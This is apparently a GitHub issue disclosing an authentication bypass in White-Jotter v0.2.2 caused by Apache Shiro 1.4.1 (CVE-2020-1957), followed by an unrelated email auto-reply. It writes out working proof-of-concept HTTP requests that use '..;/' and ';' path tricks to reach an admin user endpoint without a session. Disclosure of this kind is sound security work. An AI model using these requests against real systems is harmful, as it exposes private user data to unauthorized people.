Authorization bypass

[gaogaostone]

White-Jotter v0.2.2 has an authorization bypass vulnerability, allowing unauthorized users to access sensitive system information and even modify critical system data. This vulnerability compromises the confidentiality, integrity of the system.

Code Auditing

Shiro 1.4.1 is used for access control by the project. According to CVE-2020-1957, Apache Shiro before 1.5.2, when using Apache Shiro with Spring dynamic controllers, a specially crafted request may cause an authentication bypass. Therefore, the projects is vulnerable to authentication bypass.

Proof of Concept

1. Visit the url http://x.x.x.x:8443/api/admin/user to get user information. Without cookie, it responses no data. The request and response are as following.
2. Add “/xxx/..;/” in the head of the request path, aka the new url is http://x.x.x.x:8443/xxx/..;/api/admin/user. Although without cookie, it responses with user information. It bypasses the authentication.

   
   GET /xxx/..;/api/admin/user HTTP/1.1
   Host: x.x.x.x:8443
   User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
   Accept: application/json, text/plain, */*
   Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
   Accept-Encoding: gzip, deflate, br
   Origin: http://x.x.x.x:8080
   Connection: keep-alive
   Referer: http://x.x.x.x:8080/

![image](https://github.com/user-attachments/assets/7bd77111-4e9c-4202-9253-672b8ca5a6c4)
3. We can also use this payload to bypass the authentication.

GET /api/;/admin/user HTTP/1.1 Host: x.x.x.x:8443 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: application/json, text/plain, / Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Origin: http://x.x.x.x:8080 Connection: keep-alive Referer: http://x.x.x.x:8080/

![image](https://github.com/user-attachments/assets/67dc99bc-a258-4fcb-b362-5fb22ae170c9)

[CFH-Steven]

这是来自QQ邮箱的假期自动回复邮件。   你好，你发的信息我已经收到，谢谢。